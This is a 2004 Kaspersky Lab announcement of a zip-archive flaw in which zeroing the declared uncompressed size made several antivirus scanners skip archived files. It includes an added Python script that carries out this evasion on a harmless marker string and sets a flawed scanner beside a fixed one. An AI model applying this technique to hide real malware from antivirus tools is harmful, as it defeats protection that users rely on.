Kaspersky Lab eliminates vulnerability in antivirus scanning of archived files
22 Oct 2004
iDefense, a company that publishes security intelligence on potential cyber threats and security issues, has identified a vulnerability in the products of several antivirus vendors, including McAfee, Computer Associates, Kaspersky Lab, Sophos, Eset and RAV.
Kaspersky Lab confirms that the vulnerability exists. It is an error-handling flaw in the parsing of zip format files. It could potentially be exploited remotely, allowing attackers to evade virus detection and thus bypass security protection.
The .zip file format stores information about each compressed file in two places: the local file header that precedes the file data, and the central directory (sometimes called the global header) at the end of the archive. Both record the real size of the file once uncompressed. If this size field is changed to 0, the affected antivirus scanner fails to scan the file, because it trusts the declared size and treats the file as too small to contain any threat. Changing the size field does not affect the functionality of the archiver: the compressed data and its CRC are untouched, so files are still correctly unpacked. The lesson for a scanner is not to trust the declared size at all, but to inflate the compressed stream and scan whatever actually comes out.
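The following script, added here as an illustration and not code from Kaspersky Lab or iDefense, reproduces the evasion end to end. It builds a small archive containing a constructed marker string (standing in for a detected file body; it is not real malware), zeroes the uncompressed-size field in both the local file header and the central directory, and then runs two scanners over it: one that trusts the declared size and skips "too small" entries, and one that ignores that field, inflates the compressed stream with an output bound and verifies the CRC. The header offsets are those of the standard PKWARE zip layout; the archive is assumed to be single-disk, uncommented and without ZIP64 records.

```python
import io
import struct
import zipfile
import zlib

# Constructed stand-in for a known-bad file body; it is not real malware.
SIGNATURE = b"CONSTRUCTED-TEST-MARKER"
PAYLOAD = (SIGNATURE + b": pretend this is a detected file body. ") * 4

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
ZIP_STORED, ZIP_DEFLATED = 0, 8


def build_zip(name, data):
    """Write a one-entry deflated archive in memory (the untouched archive)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def parse_entries(archive):
    """Walk the central directory and return one dict per entry, carrying the
    uncompressed-size field from both the central and the local header.
    Assumes a single-disk archive with no comment and no ZIP64 records."""
    eocd = archive.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    cd_size, cd_off = struct.unpack_from("<II", archive, eocd + 12)
    entries, pos = [], cd_off
    while pos < cd_off + cd_size:
        if archive[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError("bad central directory signature")
        # method(2) mtime+mdate(4, skipped) crc(4) csize(4) usize(4) nlen elen clen
        method, crc, csize, usize_cd, nlen, elen, clen = struct.unpack_from(
            "<H4xIIIHHH", archive, pos + 10)
        local = struct.unpack_from("<I", archive, pos + 42)[0]
        name = archive[pos + 46:pos + 46 + nlen].decode()
        if archive[local:local + 4] != LOCAL_SIG:
            raise ValueError("bad local file header signature")
        # local header: usize at +22, name length at +26, extra length at +28
        usize_local, lnlen, lelen = struct.unpack_from("<IHH", archive, local + 22)
        entries.append({
            "name": name, "method": method, "crc": crc, "csize": csize,
            "usize_cd": usize_cd, "usize_local": usize_local,
            "cd_hdr": pos, "local_hdr": local,
            "data_off": local + 30 + lnlen + lelen,
        })
        pos += 46 + nlen + elen + clen
    return entries


def zero_uncompressed_size(archive):
    """The evasion: set the uncompressed-size field to 0 in both headers of
    every entry. Compressed bytes and CRC are left untouched."""
    out = bytearray(archive)
    for e in parse_entries(archive):
        struct.pack_into("<I", out, e["local_hdr"] + 22, 0)
        struct.pack_into("<I", out, e["cd_hdr"] + 24, 0)
    return bytes(out)


def inflate(archive, entry, limit=1 << 20):
    """Recover an entry from its compressed stream alone, bounding the output
    (zip-bomb guard) and checking the CRC recorded in the header."""
    raw = archive[entry["data_off"]:entry["data_off"] + entry["csize"]]
    if entry["method"] == ZIP_STORED:
        body = raw
    elif entry["method"] == ZIP_DEFLATED:
        d = zlib.decompressobj(-15)  # raw deflate, no zlib wrapper
        body = d.decompress(raw, limit)
        if d.unconsumed_tail or not d.eof:
            raise ValueError(f"{entry['name']}: truncated or exceeds {limit} bytes")
    else:
        raise ValueError(f"{entry['name']}: unsupported method {entry['method']}")
    if zlib.crc32(body) != entry["crc"]:
        raise ValueError(f"{entry['name']}: CRC mismatch")
    return body


def scan_trusting_header(archive):
    """Flawed scanner: believes the declared size and skips entries too small
    to hold a threat. Returns the names of flagged entries."""
    hits = []
    for e in parse_entries(archive):
        if e["usize_local"] < len(SIGNATURE):
            continue  # "too small to be dangerous": this is the bypass
        if SIGNATURE in inflate(archive, e):
            hits.append(e["name"])
    return hits


def scan_inflating_stream(archive):
    """Fixed scanner: ignores the declared size and scans what really inflates."""
    hits = []
    for e in parse_entries(archive):
        if SIGNATURE in inflate(archive, e):
            hits.append(e["name"])
    return hits


def demo():
    original = build_zip("sample.bin", PAYLOAD)
    evasive = zero_uncompressed_size(original)
    first = parse_entries(evasive)[0]
    return {
        "trusting_original": scan_trusting_header(original),
        "trusting_evasive": scan_trusting_header(evasive),
        "inflating_evasive": scan_inflating_stream(evasive),
        "declared_sizes": (first["usize_local"], first["usize_cd"]),
        "still_unpacks": inflate(evasive, first) == PAYLOAD,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it shows the trusting scanner flagging the untouched archive but returning nothing for the modified one, while the stream-inflating scanner flags both, and `inflate` still returns the full payload from the modified archive because the deflate stream and CRC were never changed. In a production scanner the disagreement between the declared size and the inflated length is itself worth logging as a tampering signal.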
'We are grateful to iDefense for bringing this vulnerability to our attention. Although it does theoretically represent a security risk, we haven't detected any attempts to exploit this vulnerability. Our weekly update patches the vulnerability in versions 3.x and 4.x, and a patch for version 5.x will be released in the near future, eliminating the incompatibility between the antivirus scanner and the .zip archiver,' said Eugene Kaspersky, the company's Head of Anti-Virus Research.